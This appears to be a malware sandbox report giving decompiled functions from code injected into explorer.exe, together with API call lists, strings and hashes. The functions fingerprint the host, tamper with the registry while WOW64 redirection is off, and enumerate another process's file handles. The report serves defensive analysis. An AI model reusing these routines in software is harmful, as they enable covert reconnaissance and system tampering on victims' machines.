				_v8 = _v8 << 0x00000007 & 0x9d2c5680 ^ _v8;
				_v8 = _v8 << 0x0000000f & 0xefc60000 ^ _v8;
				_v8 = _v8 >> 0x00000012 ^ _v8;
				return _v8;
			}

0x003f88c3
0x003f88c9
0x003f88db
0x003f8905
0x003f892d
0x003f88d8
0x003f88d8
0x003f893d
0x003f8966
0x003f898e
0x003f893a
0x003f893a
0x003f89ae
0x003f89cf
0x003f89d8
0x003f89d8
0x003f89e5
0x003f89f1
0x003f89f7
0x003f8a03
0x003f8a12
0x003f8a23
0x003f8a35
0x003f8a41
0x003f8a4a

Memory Dump Source

Source File: 0000000C.00000002.752639572.003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3f0000_explorer.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 413908ed9e21bfb47d5a0caec6ce073b340483da84eca8bc7d4c3a9ec9f4af17
Instruction ID: c1b36e1852496b3eb75b89e117d05e65d435508d6181d295c6f471a14ae142c5
Opcode Fuzzy Hash: 413908ed9e21bfb47d5a0caec6ce073b340483da84eca8bc7d4c3a9ec9f4af17
Instruction Fuzzy Hash: 1B51BC74A01208EFDB08CF58C595AADBBB2FF88354F2482A9D9459B345CB35AF51DF80

Uniqueness

Uniqueness Score: 0.00%

Function 01506934, Relevance: 45.8, APIs: 17, Strings: 9, Instructions: 254
stringtimeUNIQUE

Download Yara Rule

C-Code - Quality: 38%

			E01506934(void* __ecx, void* __edx, void* __eflags, void* __fp0, CHAR* _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				long _v20;
				long _v24;
				struct _SYSTEMTIME _v40;
				char _v44;
				char _v108;
				signed int _v112;
				char _v176;
				char _v432;
				char _v688;
				char _v1200;
				char _v1216;
				void* __ebx;
				void* _t72;
				signed int _t88;
				char* _t92;
				signed int _t93;
				char* _t95;
				signed int _t104;
				intOrPtr _t113;
				void* _t116;
				int _t117;
				signed int _t121;
				signed int _t126;
				signed int _t129;
				signed int _t133;
				void* _t139;
				CHAR* _t140;
				CHAR* _t141;
				void* _t144;
				signed int _t146;
				signed int _t151;
				intOrPtr _t155;
				intOrPtr _t159;
				void* _t163;
				char* _t165;
				intOrPtr _t166;
				void* _t170;
				intOrPtr _t171;
				void* _t177;
				void* _t178;
				void* _t179;
				void* _t180;
				void* _t182;
				void* _t183;
				void* _t184;
				void* _t186;

				_t184 = __eflags;
				_t163 = __edx;
				_v24 = 0;
				_v20 = 0;
				E01513BA0(__ecx,  &_v1216, 0, 0x498);
				_t72 = E015068B4(_t139, _t184, __fp0,  &_v1216);
				_t178 = _t177 + 0x10;
				if(_t72 >= 0) {
					L6:
					E0151FA90( &_v688, 0x100);
					_pop(_t144);
					_v44 = E0151D810(_t144);
					_v24 = 0x100;
					GetComputerNameA( &_v432,  &_v24);
					GetLocalTime( &_v40);
					_push(_v40.wYear & 0x0000ffff);
					_push(_v40.wMonth & 0x0000ffff);
					_push(_v40.wDay & 0x0000ffff);
					_push(_v40.wSecond & 0x0000ffff);
					_push(_v40.wMinute & 0x0000ffff);
					E01513C30( &_v176, 0x3f,  *0x153ac38, _v40.wHour & 0x0000ffff);
					_t88 = E01515B10(_t144, __eflags, 1);
					_push( *0x1535004);
					_v112 = _t88;
					E01513C30( &_v108, 0x40, "%04x.%u",  *0x1535000 & 0x0000ffff);
					_t92 = E01515B10(_t144, __eflags, 0x2f);
					_t179 = _t178 + 0x40;
					_t165 = _t92;
					_t93 = E01515350(_t144, 0x95c);
					_v8 = _t93;
					__eflags = _t93;
					if(_t93 == 0) {
						L4:
						return _t93 | 0xffffffff;
					}
					__eflags = _t165;
					if(_t165 == 0) {
						_t165 = "NULL";
					}
					_t146 = _v112;
					__eflags = _t146;
					if(_t146 == 0) {
						_t146 = "??";
					}
					__eflags = _v44 - 1;
					_t95 = "YES";
					if(_v44 != 1) {
						_t95 = "NO";
					}
					_push(_t165);
					_push("C:\Windows\explorer.exe");
					_push(_t146);
					_t166 = _a8;
					_t140 = _a4;
					_push( &_v108);
					_push( &_v688);
					_push(_t95);
					_push(0x1538c28);
					_push(0x1538ba8);
					_push( &_v432);
					_push( &_v1200);
					E01513C30(_t140, _t166 - 1, _v8,  &_v1216);
					E01515460( &_v8);
					_t104 = E0150A17A( &_v20,  &_v688,  &_v20);
					_t180 = _t179 + 0x40;
					__eflags = _t104;
					_v16 = _t104;
					if(_t104 <= 0) {
						L26:
						_push(" ");
						_push(_t166 - lstrlenA(_t140) - 1);
						_push( &(_t140[lstrlenA(_t140)]));
						E01513C30();
						__eflags = 0;
						return 0;
					} else {
						_v8 = 0;
						__eflags = _v20;
						if(_v20 <= 0) {
							L25:
							E01513990( &_v16, 0);
							goto L26;
						}
						_v12 = 0;
						do {
							_t113 = _v12;
							_t151 = _v16;
							__eflags =  *(_t113 + _t151) & 0x00000004;
							if(( *(_t113 + _t151) & 0x00000004) != 0) {
								goto L24;
							}
							_t116 = lstrlenA(_t140) + 1;
							__eflags = _t116 - _t166;
							if(_t116 >= _t166) {
								goto L25;
							}
							_t170 = _v12 + _v16;
							__imp__#12( *((intOrPtr*)(_t170 + 0x38)));
							__imp__#12( *((intOrPtr*)(_t170 + 8)), _t116);
							_push(_t116);
							_t117 = lstrlenA(_t140);
							_t171 = _a8;
							E01513C30( &(_t140[lstrlenA(_t140)]), _t171 - _t117 - 1, " iface_%d=[%s/%s]", _v8);
							_t121 = _v16;
							_t155 = _v12;
							_t182 = _t180 + 0x18;
							__eflags =  *(_t155 + _t121) & 0x00000001;
							if(( *(_t155 + _t121) & 0x00000001) == 0) {
								_push(" DOWN");
							} else {
								_push(" UP");
							}
							_push(_t171 - lstrlenA(_t140) - 1);
							_push( &(_t140[lstrlenA(_t140)]));
							E01513C30();
							_t126 = _v16;
							_t159 = _v12;
							_t183 = _t182 + 0xc;
							__eflags =  *(_t159 + _t126) & 0x00000008;
							if(( *(_t159 + _t126) & 0x00000008) != 0) {
								_push(" PPP");
								_push(_t171 - lstrlenA(_t140) - 1);
								_t133 =  &(_t140[lstrlenA(_t140)]);
								__eflags = _t133;
								_push(_t133);
								E01513C30();
								_t183 = _t183 + 0xc;
							}
							_push(0x152a380);
							_push(_t171 - lstrlenA(_t140) - 1);
							_t129 =  &(_t140[lstrlenA(_t140)]);
							__eflags = _t129;
							_push(_t129);
							E01513C30();
							_t166 = _a8;
							_t180 = _t183 + 0xc;
							L24:
							_v8 = _v8 + 1;
							_v12 = _v12 + 0x4c;
							__eflags = _v8 - _v20;
						} while (_v8 < _v20);
						goto L25;
					}
				}
				_t93 = E015077B8(_t163);
				_t186 = _t163;
				if(_t186 > 0 || _t186 >= 0 && _t93 >= 0xe10) {
					_t141 = "?";
					lstrcpyA( &_v1216, _t141);
					lstrcpyA( &_v1200, _t141);
					goto L6;
				} else {
					goto L4;
				}
			}

0x01506934
0x01506934
0x0150694f
0x01506952
0x01506955
0x01506961
0x01506966
0x0150696b
0x015069a6
0x015069b3
0x015069b9
0x015069bf
0x015069cd
0x015069d0
0x015069da
0x015069e4
0x015069e9
0x015069ee
0x015069f3
0x015069f8
0x01506a0d
0x01506a14
0x01506a19
0x01506a1f
0x01506a35
0x01506a3c
0x01506a41
0x01506a49
0x01506a4b
0x01506a51
0x01506a54
0x01506a56
0x0150697f
0x00000000
0x0150697f
0x01506a5c
0x01506a5e
0x01506a60
0x01506a60
0x01506a65
0x01506a68
0x01506a6a
0x01506a6c
0x01506a6c
0x01506a71
0x01506a75
0x01506a7a
0x01506a7c
0x01506a7c
0x01506a81
0x01506a82
0x01506a87
0x01506a88
0x01506a8b
0x01506a91
0x01506a98
0x01506a99
0x01506a9a
0x01506a9f
0x01506aaa
0x01506ab1
0x01506ac1
0x01506aca
0x01506ad3
0x01506ad8
0x01506adb
0x01506ae3
0x01506ae6
0x01506be9
0x01506be9
0x01506bf4
0x01506bfa
0x01506bfb
0x01506c03
0x00000000
0x01506aec
0x01506aee
0x01506af1
0x01506af4
0x01506bdc
0x01506be2
0x00000000
0x01506be8
0x01506afa
0x01506afd
0x01506afd
0x01506b00
0x01506b03
0x01506b07
0x00000000
0x00000000
0x01506b10
0x01506b11
0x01506b13
0x00000000
0x00000000
0x01506b1c
0x01506b22
0x01506b2c
0x01506b32
0x01506b3c
0x01506b3e
0x01506b4d
0x01506b52
0x01506b55
0x01506b58
0x01506b5b
0x01506b5f
0x01506b68
0x01506b61
0x01506b61
0x01506b61
0x01506b75
0x01506b7b
0x01506b7c
0x01506b81
0x01506b84
0x01506b87
0x01506b8a
0x01506b8e
0x01506b90
0x01506b9d
0x01506ba1
0x01506ba1
0x01506ba3
0x01506ba4
0x01506ba9
0x01506ba9
0x01506bac
0x01506bb7
0x01506bbb
0x01506bbb
0x01506bbd
0x01506bbe
0x01506bc3
0x01506bc6
0x01506bc9
0x01506bc9
0x01506bcf
0x01506bd3
0x01506bd3
0x00000000
0x01506afd
0x01506ae6
0x0150696d
0x01506972
0x01506974
0x0150698d
0x0150699a
0x015069a4
0x00000000
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 015068B4: #12.WS2_32(00000000,00000010,?,01501F74,?), ref: 015068D9

lstrcpyA.KERNEL32(?,0152A5AC,?,?,00040000,00000001), ref: 0150699A
lstrcpyA.KERNEL32(?,0152A5AC,?,?,00040000,00000001), ref: 015069A4
GetComputerNameA.KERNEL32(?,00093A80,?,?,00040000,00000001), ref: 015069D0
GetLocalTime.KERNEL32(00000000,?,?,00040000,00000001), ref: 015069DA
lstrlenA.KERNEL32(00000000), ref: 01506B0E
#12.WS2_32(?), ref: 01506B22
#12.WS2_32(?,00000000), ref: 01506B2C
lstrlenA.KERNEL32(00000000, iface_%d=[%s/%s],?,00000000), ref: 01506B3C
lstrlenA.KERNEL32(00000000,?), ref: 01506B48
lstrlenA.KERNEL32(00000000, DOWN), ref: 01506B6E
lstrlenA.KERNEL32(00000000,?), ref: 01506B77
lstrlenA.KERNEL32(00000000, PPP), ref: 01506B96
lstrlenA.KERNEL32(00000000,?), ref: 01506B9F
lstrlenA.KERNEL32(00000000,0152A380), ref: 01506BB2
lstrlenA.KERNEL32(00000000,?), ref: 01506BB9
lstrlenA.KERNEL32(00000000,0152A3B0), ref: 01506BEF
lstrlenA.KERNEL32(00000000,?), ref: 01506BF6

Strings

NULL, xrefs: 01506A60
C:\Windows\explorer.exe, xrefs: 01506A82
%04x.%u, xrefs: 01506A2A
PPP, xrefs: 01506B90
L, xrefs: 01506BCF
UP, xrefs: 01506B61
iface_%d=[%s/%s], xrefs: 01506B36
YES, xrefs: 01506A75, 01506A99
DOWN, xrefs: 01506B68

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: lstrlen$lstrcpy$ComputerLocalNameTime
String ID: DOWN$ PPP$ UP$ iface_%d=[%s/%s]$%04x.%u$C:\Windows\explorer.exe$L$NULL$YES
API String ID: 3083431432-4246363325
Opcode ID: 72e318220444a3cb8d03a9a5902205c0a8965896972d47d5c24f980cea9fbda7
Instruction ID: 9cfa8cf8df6910f831fdd8d21dbdfac4159675946d05ac2e4f31a8928be6ae43
Opcode Fuzzy Hash: 72e318220444a3cb8d03a9a5902205c0a8965896972d47d5c24f980cea9fbda7
Instruction Fuzzy Hash: BC8182B2E00219BFDF12EBE5CC88EAE7BBCFF45214F144456F505EB181EA749A548B60

Uniqueness

Uniqueness Score: 100.00%

Function 003FE230, Relevance: 44.0, APIs: 19, Strings: 6, Instructions: 290
stringregistrylibraryCOMMON

Download Yara Rule

C-Code - Quality: 32%

			E003FE230(void* _a4, WCHAR* _a8, WCHAR* _a12, int _a16, char* _a20, int _a24) {
				void* _v8;
				void* _v12;
				long _v16;
				int _v20;
				int _v24;
				intOrPtr _v28;
				WCHAR* _v32;
				int _v36;
				CHAR* _v40;
				_Unknown_base(*)()* _v44;
				signed int _v48;
				_Unknown_base(*)()* _v52;
				char _v180;
				char _v184;
				char _v188;
				signed int _t102;
				CHAR* _t118;
				int _t124;
				int _t126;
				int _t127;
				int _t128;
				int _t133;
				signed int _t135;
				void* _t143;
				int _t158;
				int _t159;
				int _t161;
				void* _t215;
				void* _t217;
				void* _t221;
				void* _t222;

				_v12 = _a4;
				if(_a4 != 0x80000002) {
					L35:
					_t102 = RegOpenKeyExW(_a4, _a8, 0, 2,  &_v8);
					_v16 = _t102;
					if(_v16 == 0) {
						if(_a20 == 0) {
							_v16 = RegDeleteValueW(_v8, _a12);
							if(_v16 == 0) {
								while(0 != 0) {
								}
								L53:
								RegCloseKey(_v8);
								return 0;
							}
							while(0 != 0) {
							}
							RegCloseKey(_v8);
							return 0xfffffffd;
						}
						_v16 = RegSetValueExW(_v8, _a12, 0, _a16, _a20, _a24);
						if(_v16 == 0) {
							while(0 != 0) {
							}
							goto L53;
						}
						while(0 != 0) {
						}
						RegCloseKey(_v8);
						return 0xfffffffe;
					}
					while(0 != 0) {
					}
					return _t102 | 0xffffffff;
				}
				_t169 =  *0x40f7fc & 0x0000ffff;
				if(( *0x40f7fc & 0x0000ffff) != 9 ||  *0x41150c == 0) {
					goto L35;
				} else {
					_v20 = 0;
					_v36 = 0;
					_v32 = E003F7F40(_t169, 0x2bed);
					_t118 = E003F8060(_t169, 0x925);
					_t217 = _t215 + 8;
					_v40 = _t118;
					_v24 = 0;
					if(_a20 == 0) {
						L34:
						E003F3F10( &_v36, 0xfffffffe);
						E003F8170( &_v32);
						E003F8170( &_v40);
						return _v24;
					}
					if(_a16 != 4) {
						if(_a16 != 1) {
							while(0 != 0) {
							}
							_v24 = 0xfffffffc;
							goto L34;
						}
						_t124 = lstrlenW("C:\Windows");
						_t126 = lstrlenW(_v32);
						_t172 = _a8;
						_t127 = lstrlenW(_a8);
						_t128 = lstrlenW(_a12);
						_v28 = _t124 + _t126 + 1 + _t127 + _t128 + lstrlenW( &(_a20[0x28]));
						goto L11;
					} else {
						_t158 = lstrlenW("C:\Windows");
						_t159 = lstrlenW(_v32);
						_t161 = lstrlenW(_a8);
						_t172 = _a12;
						_v28 = _t158 + _t159 + 1 + _t161 + lstrlenW(_a12) + 0x28;
						L11:
						_t133 = E003F3EE0(_t172, _v28 + _v28 + 2);
						_t217 = _t217 + 4;
						_v36 = _t133;
						if(_v36 != 0) {
							_t135 = E003F3B30(_v36, _v28, L"%s\\system32\\", "C:\Windows");
							_t217 = _t217 + 0x10;
							_v48 = _t135;
							if(_v48 >= 0) {
								if(_a16 != 4) {
									_push(_a20);
									_push(_a12);
									_push(L"REG_SZ");
									E003F3B30(_v36 + _v48 * 2, _v28 - _v48, _v32, _a8);
									_t221 = _t217 + 0x1c;
								} else {
									E003F3B30( &_v180, 0x40, 0x40881c,  *_a20);
									_push( &_v180);
									_push(_a12);
									_push(L"REG_DWORD");
									E003F3B30(_v36 + _v48 * 2, _v28 - _v48, _v32, _a8);
									_t221 = _t217 + 0x2c;
								}
								while(0 != 0) {
								}
								_v52 = GetProcAddress(GetModuleHandleA(_v40), "Wow64DisableWow64FsRedirection");
								E003F8170( &_v40);
								_t222 = _t221 + 4;
								if(_v52 != 0) {
									_v52( &_v184);
									_t222 = _t222 + 4;
								}
								_t143 = E003F41B0( &_v20, _v36,  &_v20, 0x1388, 1);
								_t217 = _t222 + 0x10;
								if(_t143 != 0) {
									while(0 != 0) {
									}
									goto L32;
								} else {
									while(0 != 0) {
									}
									_v24 = 0xfffffff9;
									L32:
									_v44 = GetProcAddress(GetModuleHandleA(_v40), "Wow64EnableWow64FsRedirection");
									if(_v44 != 0) {
										_v44( &_v188);
										_t217 = _t217 + 4;
									}
									goto L34;
								}
							}
							while(0 != 0) {
							}
							_v24 = 0xfffffffa;
							goto L34;
						}
						while(0 != 0) {
						}
						_v24 = 0xfffffffb;
						goto L34;
					}
				}
			}

0x003fe23d
0x003fe247
0x003fe4f3
0x003fe503
0x003fe509
0x003fe510
0x003fe524
0x003fe578
0x003fe57f
0x003fe598
0x003fe59c
0x003fe59e
0x003fe5a2
0x00000000
0x003fe5a8
0x003fe581
0x003fe585
0x003fe58b
0x00000000
0x003fe591
0x003fe542
0x003fe549
0x003fe562
0x003fe566
0x00000000
0x003fe568
0x003fe54b
0x003fe54f
0x003fe555
0x00000000
0x003fe55b
0x003fe512
0x003fe516
0x00000000
0x003fe518
0x003fe24d
0x003fe257
0x00000000
0x003fe26a
0x003fe26a
0x003fe271
0x003fe285
0x003fe28d
0x003fe292
0x003fe295
0x003fe298
0x003fe2a3
0x003fe4c5
0x003fe4cb
0x003fe4d7
0x003fe4e3
0x00000000
0x003fe4eb
0x003fe2ad
0x003fe2ed
0x003fe336
0x003fe33a
0x003fe33c
0x00000000
0x003fe33c
0x003fe2f4
0x003fe300
0x003fe30a
0x003fe30e
0x003fe31a
0x003fe331
0x00000000
0x003fe2af
0x003fe2b4
0x003fe2c0
0x003fe2ce
0x003fe2d6
0x003fe2e4
0x003fe348
0x003fe350
0x003fe355
0x003fe358
0x003fe35f
0x003fe385
0x003fe38a
0x003fe38d
0x003fe394
0x003fe3ac
0x003fe400
0x003fe404
0x003fe405
0x003fe423
0x003fe428
0x003fe3ae
0x003fe3c2
0x003fe3d0
0x003fe3d4
0x003fe3d5
0x003fe3f3
0x003fe3f8
0x003fe3f8
0x003fe42b
0x003fe42f
0x003fe447
0x003fe44e
0x003fe453
0x003fe45a
0x003fe463
0x003fe466
0x003fe466
0x003fe478
0x003fe47d
0x003fe482
0x003fe493
0x003fe497
0x00000000
0x003fe484
0x003fe484
0x003fe488
0x003fe48a
0x003fe499
0x003fe4af
0x003fe4b6
0x003fe4bf
0x003fe4c2
0x003fe4c2
0x00000000
0x003fe4b6
0x003fe482
0x003fe396
0x003fe39a
0x003fe39c
0x00000000
0x003fe39c
0x003fe361
0x003fe365
0x003fe367
0x00000000
0x003fe367
0x003fe2ad

APIs

lstrlenW.KERNEL32(C:\Windows), ref: 003FE2B4
lstrlenW.KERNEL32(?), ref: 003FE2C0
lstrlenW.KERNEL32(?), ref: 003FE2CE
lstrlenW.KERNEL32(?), ref: 003FE2DA

Part of subcall function 003F3B30: wvnsprintfW.SHLWAPI(-00001434,?,?,?,?,?,?,-00001434,TEMP), ref: 003F3B5E
Part of subcall function 003F3B30: lstrlenW.KERNEL32(00000000), ref: 003F3B85

lstrlenW.KERNEL32(C:\Windows), ref: 003FE2F4
lstrlenW.KERNEL32(?), ref: 003FE300
lstrlenW.KERNEL32(?), ref: 003FE30E
lstrlenW.KERNEL32(?), ref: 003FE31A
lstrlenW.KERNEL32(?), ref: 003FE329
GetModuleHandleA.KERNEL32(?,Wow64DisableWow64FsRedirection), ref: 003FE43A
GetProcAddress.KERNEL32(00000000), ref: 003FE441
GetModuleHandleA.KERNEL32(?,Wow64EnableWow64FsRedirection), ref: 003FE4A2
GetProcAddress.KERNEL32(00000000), ref: 003FE4A9
RegOpenKeyExW.ADVAPI32(?,?,00000000,00000002,?), ref: 003FE503
RegSetValueExW.ADVAPI32(?,?,00000000,?,?,?), ref: 003FE53C
RegCloseKey.ADVAPI32(?), ref: 003FE555
RegDeleteValueW.ADVAPI32(?,?), ref: 003FE572
RegCloseKey.ADVAPI32(?), ref: 003FE58B
RegCloseKey.ADVAPI32(?), ref: 003FE5A2

Strings

C:\Windows, xrefs: 003FE2AF, 003FE2EF, 003FE373
%s\system32\, xrefs: 003FE378
REG_SZ, xrefs: 003FE405
REG_DWORD, xrefs: 003FE3D5
Wow64EnableWow64FsRedirection, xrefs: 003FE499
Wow64DisableWow64FsRedirection, xrefs: 003FE431

Memory Dump Source

Source File: 0000000C.00000002.752639572.003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3f0000_explorer.jbxd

Yara matches

Similarity

API ID: lstrlen$Close$AddressHandleModuleProcValue$DeleteOpenwvnsprintf
String ID: %s\system32\$C:\Windows$REG_DWORD$REG_SZ$Wow64DisableWow64FsRedirection$Wow64EnableWow64FsRedirection
API String ID: 2270979939-567110100
Opcode ID: 9b7aa7ef8092af3b37d355d8fb6c6a0f1d641ceda5157376eb46f72e2e3144d1
Instruction ID: e26d412b05ba9e44bfb4d51745fd17f2b34e5d05ca6b78b45910b4ac8f4d0545
Opcode Fuzzy Hash: 9b7aa7ef8092af3b37d355d8fb6c6a0f1d641ceda5157376eb46f72e2e3144d1
Instruction Fuzzy Hash: E3B15EB590021DDBCF11DFA4DD49ABE77B8AF48304F148529FA16A72A0E734DA40CFA1

Uniqueness

Uniqueness Score: 3.53%

Function 003FC370, Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 297
libraryloaderUNIQUE

Download Yara Rule

C-Code - Quality: 49%

			E003FC370(intOrPtr _a4) {
				_Unknown_base(*)()* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				WCHAR* _v40;
				_Unknown_base(*)()* _v44;
				signed int _v48;
				_Unknown_base(*)()* _v52;
				void* _v56;
				WCHAR* _v60;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				signed short _v74;
				intOrPtr _v76;
				intOrPtr _v80;
				signed int _t104;
				signed int _t107;
				signed int _t108;
				WCHAR* _t110;
				intOrPtr* _t120;
				signed int _t124;
				signed int _t127;
				signed int _t129;
				signed int _t132;
				WCHAR* _t137;
				signed int _t146;
				signed int _t159;
				signed int _t162;
				void* _t191;
				void* _t192;
				void* _t193;
				void* _t194;

				_v32 = 0;
				_v8 = 0;
				_v52 = 0;
				_v44 = 0;
				_v20 = 0;
				_v28 = 0x10000;
				_v24 = 0;
				_v40 = 0;
				_v48 = 0;
				_v12 = 0;
				_v8 = GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtQuerySystemInformation");
				_v52 = GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtDuplicateObject");
				_v44 = GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtQueryObject");
				if(_v8 == 0 || _v52 == 0 || _v44 == 0) {
					while(0 != 0) {
					}
					return 0;
				} else {
					_t148 =  *0x4111b4; // 0x924
					_v24 = OpenProcess(0x40, 0, _t148);
					__eflags = _v24;
					if(_v24 != 0) {
						_t104 = E003F3EE0(_t148, _v28);
						_t192 = _t191 + 4;
						_v20 = _t104;
						__eflags = _v20;
						if(_v20 != 0) {
							while(1) {
								_v36 = _v8(0x10, _v20, _v28, 0);
								__eflags = _v36 - 0xc0000004;
								if(_v36 != 0xc0000004) {
									break;
								}
								_t148 = _v28 << 1;
								_t146 = E003F3FC0(_v28 << 1,  &_v20, _v28, _v28 << 1);
								_t192 = _t192 + 0xc;
								__eflags = _t146;
								if(_t146 != 0) {
									_v28 = _v28 << 1;
									continue;
								} else {
									goto L16;
								}
								while(1) {
									L16:
									__eflags = 0;
									if(0 == 0) {
										break;
									}
								}
								L65:
								E003F3F10( &_v48, 0);
								E003F3F10( &_v12, 0);
								E003F3F10( &_v40, 0);
								E003F3F10( &_v20, 0);
								__eflags = _v24;
								if(_v24 != 0) {
									CloseHandle(_v24);
								}
								return _v32;
							}
							__eflags = _v36;
							if(_v36 >= 0) {
								_t107 = E003F3EE0(_t148, 0x1000);
								_t193 = _t192 + 4;
								_v48 = _t107;
								__eflags = _v48;
								if(_v48 != 0) {
									_t108 = E003F3EE0(_t148, 0x1000);
									_t194 = _t193 + 4;
									_v12 = _t108;
									__eflags = _v12;
									if(_v12 != 0) {
										_t110 = E003F4AE0(_a4);
										_t194 = _t194 + 4;
										_v40 = _t110;
										__eflags = _v40;
										if(_v40 == 0) {
											L62:
											__eflags = _v32;
											if(_v32 != 0) {
												goto L65;
											} else {
												goto L63;
											}
											while(1) {
												L63:
												__eflags = 0;
												if(0 == 0) {
													goto L65;
												}
											}
											goto L65;
										}
										_v16 = 0;
										while(1) {
											__eflags = _v16 -  *_v20;
											if(_v16 >=  *_v20) {
												goto L62;
											}
											_t48 = (_v16 << 4) + 4; // 0x4
											_t120 = _v20 + _t48;
											_v80 =  *_t120;
											_v76 =  *((intOrPtr*)(_t120 + 4));
											_v72 =  *((intOrPtr*)(_t120 + 8));
											_v68 =  *((intOrPtr*)(_t120 + 0xc));
											_v56 = 0;
											__eflags = _v80 -  *0x4111b4; // 0x924
											if(__eflags == 0) {
												_t124 = _v52(_v24, _v74 & 0x0000ffff, GetCurrentProcess(),  &_v56, 0, 0, 0);
												__eflags = _t124;
												if(_t124 >= 0) {
													E003F4120(_v48, _v48, 0, 0x1000);
													_t194 = _t194 + 0xc;
													_t127 = _v44(_v56, 2, _v48, 0x1000, 0);
													__eflags = _t127;
													if(_t127 >= 0) {
														_t157 =  *((intOrPtr*)(_v48 + 4));
														_t129 = E003F3E60( *((intOrPtr*)(_v48 + 4)),  *((intOrPtr*)(_v48 + 4)), L"File");
														_t194 = _t194 + 8;
														__eflags = _t129;
														if(_t129 == 0) {
															__eflags = _v68 - 0x12019f;
															if(_v68 != 0x12019f) {
																E003F4120(_t157, _v12, 0, 0x1000);
																_t194 = _t194 + 0xc;
																_t132 = _v44(_v56, 1, _v12, 0x1000, 0);
																__eflags = _t132;
																if(_t132 >= 0) {
																	_t159 = _v12;
																	_v64 =  *_t159;
																	_v60 =  *((intOrPtr*)(_t159 + 4));
																	__eflags = _v64 & 0x0000ffff;
																	if((_v64 & 0x0000ffff) == 0) {
																		L61:
																		CloseHandle(_v56);
																		L34:
																		_t162 = _v16 + 1;
																		__eflags = _t162;
																		_v16 = _t162;
																		continue;
																	} else {
																		goto L55;
																	}
																	while(1) {
																		L55:
																		__eflags = 0;
																		if(0 == 0) {
																			break;
																		}
																	}
																	_t137 = StrStrIW(_v60, _v40);
																	__eflags = _t137;
																	if(_t137 == 0) {
																		goto L61;
																	} else {
																		goto L58;
																	}
																	while(1) {
																		L58:
																		__eflags = 0;
																		if(0 == 0) {
																			break;
																		}
																	}
																	_v32 = 1;
																	goto L62;
																} else {
																	goto L51;
																}
																while(1) {
																	L51:
																	__eflags = 0;
																	if(0 == 0) {
																		break;
																	}
																}
																CloseHandle(_v56);
																goto L34;
															} else {
																goto L47;
															}
															while(1) {
																L47:
																__eflags = 0;
																if(0 == 0) {
																	break;
																}
															}
															CloseHandle(_v56);
															goto L34;
														}
														CloseHandle(_v56);
														goto L34;
													} else {
														goto L41;
													}
													while(1) {
														L41:
														__eflags = 0;
														if(0 == 0) {
															break;
														}
													}
													CloseHandle(_v56);
													goto L34;
												}
												goto L34;
											}
											goto L34;
										}
										goto L62;
									} else {
										goto L29;
									}
									while(1) {
										L29:
										__eflags = 0;
										if(0 == 0) {
											break;
										}
									}
									goto L65;
								} else {
									goto L25;
								}
								while(1) {
									L25:
									__eflags = 0;
									if(0 == 0) {
										break;
									}
								}
								goto L65;
							} else {
								goto L21;
							}
							while(1) {
								L21:
								__eflags = 0;
								if(0 == 0) {
									break;
								}
							}
							goto L65;
						} else {
							goto L11;
						}
						while(1) {
							L11:
							__eflags = 0;
							if(0 == 0) {
								break;
							}
						}
						goto L65;
					} else {
						goto L7;
					}
					while(1) {
						L7:
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
					return 0;
				}
			}

0x003fc376
0x003fc37d
0x003fc384
0x003fc38b
0x003fc392
0x003fc399
0x003fc3a0
0x003fc3a7
0x003fc3ae
0x003fc3b5
0x003fc3d3
0x003fc3ed
0x003fc407
0x003fc40e
0x003fc41c
0x003fc420
0x00000000
0x003fc429
0x003fc429
0x003fc43a
0x003fc43d
0x003fc441
0x003fc454
0x003fc459
0x003fc45c
0x003fc45f
0x003fc463
0x003fc470
0x003fc47f
0x003fc482
0x003fc489
0x00000000
0x00000000
0x003fc48e
0x003fc499
0x003fc49e
0x003fc4a1
0x003fc4a3
0x003fc4b5
0x00000000
0x00000000
0x00000000
0x00000000
0x003fc4a5
0x003fc4a5
0x003fc4a5
0x003fc4a7
0x00000000
0x00000000
0x003fc4a9
0x003fc6be
0x003fc6c4
0x003fc6d2
0x003fc6e0
0x003fc6ee
0x003fc6f6
0x003fc6fa
0x003fc700
0x003fc700
0x00000000
0x003fc706
0x003fc4ba
0x003fc4be
0x003fc4d0
0x003fc4d5
0x003fc4d8
0x003fc4db
0x003fc4df
0x003fc4f1
0x003fc4f6
0x003fc4f9
0x003fc4fc
0x003fc500
0x003fc511
0x003fc516
0x003fc519
0x003fc51c
0x003fc520
0x003fc6b2
0x003fc6b2
0x003fc6b6
0x00000000
0x00000000
0x00000000
0x00000000
0x003fc6b8
0x003fc6b8
0x003fc6b8
0x003fc6ba
0x00000000
0x00000000
0x003fc6bc
0x00000000
0x003fc6b8
0x003fc526
0x003fc538
0x003fc53e
0x003fc540
0x00000000
0x00000000
0x003fc54f
0x003fc54f
0x003fc555
0x003fc55b
0x003fc561
0x003fc567
0x003fc56a
0x003fc574
0x003fc57a
0x003fc598
0x003fc59b
0x003fc59d
0x003fc5ac
0x003fc5b1
0x003fc5c5
0x003fc5c8
0x003fc5ca
0x003fc5e9
0x003fc5ed
0x003fc5f2
0x003fc5f5
0x003fc5f7
0x003fc608
0x003fc60f
0x003fc631
0x003fc636
0x003fc64a
0x003fc64d
0x003fc64f
0x003fc666
0x003fc66e
0x003fc671
0x003fc678
0x003fc67a
0x003fc6a3
0x003fc6a7
0x003fc52f
0x003fc532
0x003fc532
0x003fc535
0x00000000
0x00000000
0x00000000
0x00000000
0x003fc67c
0x003fc67c
0x003fc67c
0x003fc67e
0x00000000
0x00000000
0x003fc680
0x003fc68a
0x003fc690
0x003fc692
0x00000000
0x00000000
